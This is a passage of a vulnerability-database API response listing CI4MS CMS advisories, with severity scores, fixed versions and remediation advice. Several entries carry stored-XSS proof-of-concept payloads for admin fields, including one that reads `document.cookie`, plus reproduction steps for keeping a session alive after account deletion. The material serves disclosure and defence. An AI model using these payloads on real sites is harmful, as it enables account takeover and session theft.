place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/eNFXgAAA#IETbPcKwr5vVLqJIAdc3uy4qgcVTgyPb_2HhB4zcwAE", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34563", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15923", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15872", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15912", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18292", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34563" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-85m8-g393-jcxf", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-85m8-g393-jcxf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34563", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34563" }, { "reference_url": "https://github.com/advisories/GHSA-85m8-g393-jcxf", "reference_id": "GHSA-85m8-g393-jcxf", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-85m8-g393-jcxf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126144?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34563", "GHSA-85m8-g393-jcxf" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pds3-bx1t-zfbt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89743?format=api", "vulnerability_id": "VCID-q2ya-p1za-aug5", "summary": "CI4MS: System Settings (Company Information) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via System Settings – Company Information (Same-Page Attribute Breakout & Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Company Information Configuration Fields with Immediate Same-Page Execution\n\n### Description\nThe application fails to properly sanitize user-controlled input within **System Settings – Company Information**. Several administrative configuration fields accept attacker-controlled input that is stored server-side and later rendered without proper output encoding.\n\nAffected fields include, but are not limited to:\n1. Company Name\n2. Slogan\n3. Company Phone\n4. Company Mobile\n5. Company Email\n6. Google Maps iframe link\n7. Company Logo and other media-related fields\n\nUnlike the public-facing landing page injection vulnerability, this issue executes directly on the same settings page. The injected payload breaks out of the HTML attribute context and is immediately interpreted by the browser when rendered, resulting in same-page DOM-based stored XSS.\n\nThis represents different functionality and a separate vulnerability from public-facing rendering.\n\n### Affected Functionality\n- System Settings – Company Information configuration\n- Same-page rendering of user-controlled input fields\n- DOM attribute injection within form inputs\n- Storage and retrieval of company information values\n\n### Attack Scenario\n- An attacker injects a malicious JavaScript payload into one or more Company Information fields.\n- The payload breaks out of the HTML attribute context.\n- The application stores and re-renders the payload without sanitization or encoding.\n- The payload executes immediately on the same settings page.\n- The script executes in the browser context of the authenticated user managing settings.\n\n### Impact\n- Persistent Stored XSS\n- Immediate Same-Page DOM XSS execution\n- Execution of arbitrary JavaScript in victims’ browsers\n- Administrative privilege escalation\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire platform\n\nEndpoints:\n- `/backend/settings/` (Company Information)\n\n## Steps To Reproduce (POC)\n1. Navigate to System Settings -> Company Information\n2. Insert the following XSS payload into any Company Information field:\n`test\"><img src=1 onerror=alert()>\" class=\"form-control\" placeholder=\"Name\" required>`\n3. Save the settings\n4. Observe that the payload breaks out of the input attribute context\n5. The XSS executes immediately on the same page\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/qEcFUIjR#2OKX78JgPQI2x5957GE-vx1zYzJv2a9JqjyBsrRFBkk", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34562", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05587", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05574", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05571", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06593", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34562" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T19:48:03Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v897-c6vq-6cr3", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T19:48:03Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v897-c6vq-6cr3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34562", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34562" }, { "reference_url": "https://github.com/advisories/GHSA-v897-c6vq-6cr3", "reference_id": "GHSA-v897-c6vq-6cr3", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v897-c6vq-6cr3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34562", "GHSA-v897-c6vq-6cr3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q2ya-p1za-aug5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90225?format=api", "vulnerability_id": "VCID-rw6x-cp73-1bgj", "summary": "CI4MS: Permissions Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Group / Role Management Fields (Administrative Context Execution)**\n- Stored Cross-Site Scripting via Unsanitized Group / Role Management Inputs\n\n### Description\nThe application fails to properly sanitize user-controlled input within group and role management functionality. Multiple input fields (three distinct group-related fields) can be injected with malicious JavaScript payloads, which are then stored server-side.\n\nThese stored payloads are later rendered unsafely within privileged administrative views without proper output encoding, leading to stored cross-site scripting (XSS) within the role and permission management context.\n\n### Affected Functionality\n- Group creation and editing functionality\n- Role and permission assignment interfaces\n- Storage and retrieval of group-related data\n\n### Attack Scenario\n- An attacker injects a malicious XSS payload into one or more group-related input fields.\n- The application stores these values without sanitization or encoding.\n- An administrator views the group or role management interface.\n- The payload executes automatically in the administrator’s browser.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators\n- Full administrator account takeover\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/users/groupList/`\n\n## Steps To Reproduce (POC)\n1. Navigate to the Group / Role Management page\n2. Insert an XSS payload into any of the three group-related input fields such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the group or role changes\n4. View the group/role management page as an administrator\n5. Observe the XSS payload executing automatically\n\n## Remediation\n- Never use .html() again or any innerHTML-style like JS in your PHP, or any other sink, even if user inputs that flow into them are not clear, they still represent real world danger as an attacker can make use of this to exploit the application via XSS. And do HTML Encoding as much as possible and always do Sanitization, theres no sanitization there unfortunately. Also apply CSP, HttpOnly, SameSite, and Secure upon all application, they reduce severity of XSS & escalated-CSRF via XSS and do great jobs\n\n# Ready Video POC:\nhttps://mega.nz/file/6QUEXDbR#JXzYXg9bef_NeSUVFB4R03UeXLtAVtYwTRsdrHLlokU", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34557", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06184", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07262", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07305", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07329", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34557" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:10:40Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34557", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34557" }, { "reference_url": "https://github.com/advisories/GHSA-rpjr-985c-qhvm", "reference_id": "GHSA-rpjr-985c-qhvm", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rpjr-985c-qhvm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34557", "GHSA-rpjr-985c-qhvm" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rw6x-cp73-1bgj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90069?format=api", "vulnerability_id": "VCID-tbsh-y6wx-wfgt", "summary": "CI4MS: Stored Cross‑Site Scripting (Stored XSS) in Backend User Management Allows Session Hijacking and Full Administrative Account Compromise\n### Summary\n\nA critical Stored Cross-Site Scripting (Stored XSS) vulnerability exists in the backend user management functionality. The application fails to properly sanitize user-controlled input before rendering it in the administrative interface, allowing attackers to inject persistent JavaScript code. This results in automatic execution whenever backend users access the affected page, enabling session hijacking, privilege escalation, and full administrative account compromise.\n\n---\n\n### Details\n\nThe vulnerability resides in the backend user creation feature accessible via:\n\n```\n/backend/users\n```\n\nUser-supplied input in the **name** and **surname** fields is stored without proper validation or sanitization. When this data is later rendered in the backend users listing page, it is injected directly into the HTML without output encoding.\n\nBecause of this, attackers can embed malicious JavaScript payloads that execute in the context of authenticated backend users.\n\nThis indicates missing contextual output escaping (e.g., HTML encoding) and insufficient input sanitization, leading to persistent script execution.\n\nThe vulnerability is particularly severe because:\n\n* The payload is stored in the database (persistent XSS).\n* The script executes automatically on page load.\n* The affected page appears to be an administrative/backend interface, increasing the risk of privilege escalation.\n\n---\n\n### PoC\n\nSteps to reproduce:\n\n1. Navigate to:\n\n```\nhttp://localhost:8080/backend/users\n```\n\n2. Click **Add New User**.\n\n3. Create a new user.\n\n4. In the **name** and **surname** fields, insert the following payload:\n\n```\nadnan\"><img src=1 onerror=alert(document.cookie)><<e>img src=1 onerror=alert(document.cookie)>\n```\n\n5. Save the user.\n\n6. After saving, a popup displaying cookies will appear, demonstrating JavaScript execution.\n\n7. Revisit:\n\n```\nhttp://localhost:8080/backend/users\n```\n\n8. The popup automatically triggers again, confirming that the malicious script is stored and executed persistently.\n<img width=\"1534\" height=\"834\" alt=\"image\" src=\"https://github.com/user-attachments/assets/83f3d124-cf2e-472d-87cc-8c668ea81cba\" />\n\n---\n\n### Impact\n\nSeverity: **Critical**\n\nThis vulnerability enables:\n\n* Persistent execution of attacker-controlled JavaScript in privileged backend contexts.\n* Theft of session cookies, potentially leading to full account takeover.\n* Unauthorized actions performed on behalf of administrators (CSRF-like behavior via XSS).\n* Privilege escalation if a high-privilege user views the page.\n* Injection of keyloggers, credential harvesting scripts, or malicious redirects.\n* Full compromise of backend administrative functionality depending on role permissions.\n\nSince the payload executes automatically without user interaction once stored, exploitation requires minimal effort and can impact all backend users.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34571", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19371", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19322", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19367", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00071", "scoring_system": "epss", "scoring_elements": "0.21799", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34571" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T15:11:23Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fc4p-p49v-r948", "reference_id": "", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T15:11:23Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fc4p-p49v-r948" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34571", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34571" }, { "reference_url": "https://github.com/advisories/GHSA-fc4p-p49v-r948", "reference_id": "GHSA-fc4p-p49v-r948", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fc4p-p49v-r948" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34571", "GHSA-fc4p-p49v-r948" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tbsh-y6wx-wfgt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89174?format=api", "vulnerability_id": "VCID-tje9-d65v-bbd4", "summary": "CI4MS: Account Deletion Module Grants Full Persistent Unauthorized Access for All‑Roles via Improper Session Invalidation (Logic Flaw)\n## Summary\n### Vulnerability: Improper Session Invalidation on Account Deletion (Broken Access Control / Logic Flaw)\n- This vulnerability is caused by a backend logic flaw that maintains a false trust assumption that already-authenticated users remain trustworthy, even after their accounts are explicitly deleted. As a result, administrative security actions do not behave as intended, allowing persistent unauthorized access.\n\n### Description\nThe application fails to immediately revoke active user sessions when an account is **deleted**. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions.\n\nThe system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deleted accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control policy and results in persistent unauthorized access, representing a critical security flaw.\n\n### Affected Functionality\n- User session management and authentication logic\n- Account **deletion** mechanism\n- All authenticated endpoints, including administrative and content interfaces\n\n### Attack Scenario\n- A user logs into the application.\n- An administrator **deletes** the user account.\n- The user remains fully logged in and can continue performing all actions allowed by their role indefinitely, as there is no session expiration.\n- The user can continue invoking backend methods, triggering application actions, accessing sensitive interfaces (including user management if permitted), and interacting with the system as if the account were still active.\n- Access is only lost if the user manually logs out, which may never occur.\n\n### Impact\n- **Unauthorized Continued Access:** Deleted users retain full access indefinitely, violating intended access control and expected security behavior.\n- **Bypass of Administrative Controls:** Administrative actions (**deletion**) fail to immediately restrict active sessions.\n- **Logic Flaw Resulting in Broken Behavior:** Backend authorization logic relies on a flawed trust assumption that authenticated users remain valid, enforcing account state only at login.\n- **Full Functional Access Retained:** Deleted users can continue invoking application methods, executing actions, interacting with protected endpoints, and using the system exactly as before deletion.\n- **Privilege Abuse:** Users with elevated roles (moderator, editor, administrator) can continue performing privileged actions after account deletion, including accessing user management interfaces and modifying application state.\n- **Service Disruption Potential:** Persistent access allows attackers to disrupt services, manipulate content, or interfere with normal application operations.\n- **Attack Persistence:** Attackers can maintain access indefinitely, increasing the risk of data exfiltration, unauthorized modifications, or further privilege escalation.\n- **False Sense of Remediation:** Administrators may believe a threat has been mitigated while the deleted user remains active within the system.\n\n**Endpoint Example:** Any endpoint accessible to authenticated users, including dashboards, administrative interfaces, user management pages, and API endpoints.\n\n## Steps To Reproduce (PoC)\n1. Create or use an existing user account.\n2. Log into the application using this account.\n3. From an administrative account, **delete** the logged-in user account.\n4. Observe that the target user remains authenticated.\n5. Verify that the user can still access protected functionality, invoke actions, and interact with the application as before.\n6. Confirm that the user only loses access after manually logging out (if they choose to do so).\n\n## Remediation\n- Immediately invalidate all active sessions when an account is 